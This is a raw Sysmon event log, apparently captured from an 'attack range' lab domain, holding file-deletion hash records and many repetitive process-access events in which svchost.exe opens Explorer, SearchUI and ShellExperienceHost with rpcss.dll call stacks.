10:44:07.177{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\F8NJDPEL\views[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:07.177{C8EA50B7-F2AD-6215-BB00-000000003802}4488ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\F8NJDPEL\views[1]MD5=A726593A8261930E4786375106FC6BFE,SHA256=E6BFDFBB9A0649EA9D38DE4255C355C581097E6A1035A54943260B22AD45F172,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:07.162{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\UFGN8YJ3\views[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:07.036{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F735495109BC86F9BF3A4C6CB32EEBC,SHA256=87550E24D0A19B59C7EC2A01F0E0EA262337737730020E76ADEE40DFA665292A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:08.604{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92E9EC3FA6AFD52339CEB72D0D442BCA,SHA256=0EAAD09D779CB34E880E5C2EE5CE4DFDE71AD9FC2B95A210DA4D7FD841628D85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 